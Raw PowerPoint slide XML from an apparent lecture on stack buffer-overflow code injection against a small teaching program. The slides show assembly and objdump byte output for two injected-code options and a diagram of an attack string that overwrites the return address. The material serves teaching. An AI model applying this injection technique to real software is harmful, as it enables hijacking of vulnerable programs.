          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We will inject code to cause the program to execute as though nothing had happened</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Put the original return address where the stack pointer will find it, and then return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7425C882-B73D-BE44-8818-104DA8B19153}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4974939" y="4150384"/>
            <a:ext cx="7204753" cy="1822542"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="85000"/>
              <a:lumOff val="1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FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>000000000040063a &lt;caller&gt;:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40063a:   48 83 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 08         sub    $0x8,%rsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40063e:   b8 00 00 00 00      mov    $0x0,%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  400643:   e8 b7 ff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4005ff &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>buffer_too_small</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400648:   bf 30 07 40 00      mov    $0x400730,%edi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  40064d:   e8 7e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>fe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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4004d0 &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>puts@plt</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400652:   48 83 c4 08         add    $0x8,%rsp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  400656:   c3                  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>retq</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00FA00"/>
              </a:solidFill>
              <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="10" name="Elbow Connector 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D03D5628-976F-AB4D-9203-A8F69FA786E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4419603" y="5163226"/>
            <a:ext cx="979710" cy="2"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>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3624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39EE4C-935B-2A4A-AB9E-BD715EA3B07C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Our attack:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Option 1</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86D2843D-BE79-334E-A88D-A3B2A18235AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2029326"/>
            <a:ext cx="3129645" cy="868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movq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  $0x400648, (%</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1" name="Rounded Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C62355F4-AB98-C54C-922A-FFFDF3A9619F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3154956"/>
            <a:ext cx="8882743" cy="302813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gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -c option1.s </a:t>
            </a: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objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -d option1.o</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option1.o:     file format elf64-x86-64</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Disassembly of section .text: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0000000000000000 &lt;.text&gt;:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       0:    48 c7 04 24 48 06 40   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>movq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> $0x400648,(%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7:    00 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       8: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2070453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39EE4C-935B-2A4A-AB9E-BD715EA3B07C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Our attack:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Option 2</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86D2843D-BE79-334E-A88D-A3B2A18235AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="2029326"/>
            <a:ext cx="3129645" cy="868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$0x400648</a:t>
            </a:r>
          </a:p>
          <a:p>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1" name="Rounded Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C62355F4-AB98-C54C-922A-FFFDF3A9619F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3154956"/>
            <a:ext cx="8882743" cy="302813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gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -c option2.s </a:t>
            </a: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objdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -d option2.o</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option2.o:     file format elf64-x86-64</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Disassembly of section .text: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0000000000000000 &lt;.text&gt;:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       0:    68 48 06 40 00      </a:t>
            </a:r>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$4195912</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>       5: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1734483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Our Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Content Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7F6597E-B250-EE49-B2A2-D092CD66049E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="5421086" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We’ll put our attack string between the buffer and the return address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The push instruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The return</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Padding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The return address</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(the buffer’s address)</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3E4F3F9C-C3E6-D144-92C1-527F41720523}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6787588" y="455730"/>
            <a:ext cx="3646024" cy="5914133"/>
            <a:chOff x="6588078" y="451413"/>
            <a:chExt cx="3646024" cy="5914133"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Rectangle 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{933FE4E1-8ABE-E543-9D58-96F9493024CB}"/>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82EB00A6-9E35-CE45-B6D7-7CEA69538480}"/>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2" name="Rectangle 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7E2A67B-1936-074A-AF48-DB64EFFF2455}"/>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4D0C1969-D125-F04E-ACED-4BABA72FC2D9}"/>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14" name="Rectangle 13">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04FDE50B-280C-2745-89D7-837D7936E7D8}"/>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DD159676-F406-BF48-AD51-1F7D13409ED4}"/>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16" name="Straight Arrow Connector 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C47B543-6F0B-7B47-B268-8253BED5D168}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="15"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F8CD4001-858C-ED43-94EC-BFEAF5F185D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8959448" y="5147021"/>
            <a:ext cx="1469984" cy="467508"/>
            <a:chOff x="9124092" y="5147021"/>
            <a:chExt cx="1305340" cy="467508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Rectangle 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FEFDF873-649D-3448-A7F4-DE2BEBE6BD09}"/>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7099A9E-D568-D14B-8FCF-3341D56D1E9C}"/>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E07BF67-6227-A44E-BBAD-08B3B32E2782}"/>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8827FD-9C55-3746-B070-DA032782161C}"/>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451BDF8-CF5A-C94A-8426-E5B9C3D08CE4}"/>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262DCA-0F4C-C745-9437-1C0CEC8903B4}"/>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FEB260-DEDA-5342-97D9-647F3FB3A41D}"/>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9925A6-399C-164D-902F-2FBCE3093A20}"/>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AA0AAE2C-DB21-3349-B99C-AC5CE936E8AB}"/>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27" name="Straight Arrow Connector 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87570ACF-B578-224F-8907-115C853E97C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="26"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10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146819"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Refresher on Memory Layout</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:b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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Group 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F15EDEA-CF64-9E4E-AF31-E3AB3A7055F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1876709" y="406603"/>
            <a:ext cx="1469984" cy="6191750"/>
            <a:chOff x="10632621" y="376819"/>
            <a:chExt cx="1469984" cy="6191750"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC7C4400-EA24-D14A-890D-3CE7B13394EF}"/>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0" name="Rectangle 9">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1A6BBF8-AFFD-B54A-98BD-881940F3BE01}"/>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Document 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED486A75-0E27-A146-B5D5-3D90CE05D4EC}"/>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12" name="Rectangle 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE7DECB0-A884-5244-9827-CDE2E907B478}"/>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C412BB2C-11D2-7D44-ABAC-AF3C51982CD3}"/>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4" name="Rectangle 11">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7B8E799-790A-9640-98F8-680F7F45E80D}"/>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15" name="Straight Arrow Connector 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F2F27C6-69A9-F845-BADD-8D92BF122337}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="12"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Document 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{161B78C6-3A74-4C42-A7E0-1C652D7F8D3E}"/>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17" name="Rectangle 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{671925DF-4169-0442-9B0B-ECCCE80A9BEB}"/>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18" name="Straight Arrow Connector 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A748E03B-9EEB-B24E-9AC5-DC8E718A0EDF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="12"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8CADEF-F149-6645-8127-51590E96A62F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="10"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0" name="Rounded Rectangle 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E97B24A-CC8F-BE40-86C1-B53354DAA582}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5384800" y="790907"/>
            <a:ext cx="7632700" cy="644023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long </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>global_variable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 73;</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print_stack_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(const long *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addr</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new_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 42;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) {</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First called stack frame at %14p\n", </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>addr</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Second called stack frame at %14p\n", &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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else {</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print_stack_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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int main() {</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main_var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 88;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    const char string[] = "Hello, world!";</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first_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = NULL;</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Main stack frame at %14p\n", &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>main_var</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print_stack_address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>first_addr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="12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long *small = (long *)malloc(16);</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("Small </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FA00"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>malloc'd</a:t>
